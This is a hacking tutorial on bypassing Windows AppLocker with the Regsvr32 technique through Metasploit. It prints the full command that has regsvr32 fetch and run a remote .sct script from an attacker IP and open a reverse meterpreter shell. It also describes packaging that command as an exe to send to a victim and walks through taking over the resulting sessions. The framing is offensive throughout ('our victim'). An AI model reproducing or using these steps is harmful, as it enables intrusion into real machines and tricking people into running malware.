It is becoming difficult ( although not impossible ) day by day to hack Windows with no vulnerabilities like ms08_067 and of course a lot of security features enabled in Windows. But where there is a will, there is always a way. Regsvr32 applocker bypass exploit is one such exploit. To understand how this exploit works, you need to know some things like dll and applocker.
AppLocker introduced in Windows 7 and Windows Server 2008 R2 provides administrators to set rules to allow or deny applications from running. These rules could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).
Ok, now what is a dll? A dll is a dynamic link library. A dynamic link library contains code and data which can be used by multiple programs at the same time. These libraries usually have file extensions
OCX (for libraries containing ActiveX controls), or
DRV (for legacy system drivers).
Ok now let us see how this exploit works? Start Metasploit and load the exploit as shown below. Check the options we need to set? We can see that the reverse_tcp meterpreter payload is already set. We will be using this payload only.
Set all the required options as shown below. SRVhost and lhost are the IP address of our attacker system. After all options are set, type command “run” to run this exploit. It finishes by giving us a command as shown below. We need to run this command on our target system.
regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll
Now let us understand this command discovered by researcher Casey Smith. Regsvr32 is a command line utility to register .dll files as command components in the registry. The ‘s’ option specifies regsvr32 to run silently without displaying any message boxes. The ‘n’ option specifies regsvr32 to not call DllRegisterServer. Since we have specified regsvr32 not to call DLLregisterserver, we should specify another address. We can do this by using “i” option and the IP address where we want ( attacker IP ).
You can see above that our exploit has created a link above for an sct file and a dll.
Now it’s time for our victim to type our command on his system. Copy the command on Notepad and save it as a batch file. Convert this file to exe and send this file to the victim. I have shown one method here.
Now we have to start a listener as shown below.
Set the options exactly as we set for the exploit. So, set the port to 1111. After all the options are set, type “run” to run this exploit. If you get an error like shown below, just change the port and type “run” again. That is just a minor glitch in Metasploit.
After typing “run” the exploit will hang on as shown below.
When our user clicks on our file we sent him, a meterpreter session is opened as shown below.
This may not directly take you to a meterpreter shell and hang on as shown above. Hit on CTRL+C to interrupt the session as shown below.
Next type “sessions -l” to see the available meterpreter sessions. when you get the available sessions type command “sessions -i 2” where “2” is its session id as shown below. Next, well you know what it is.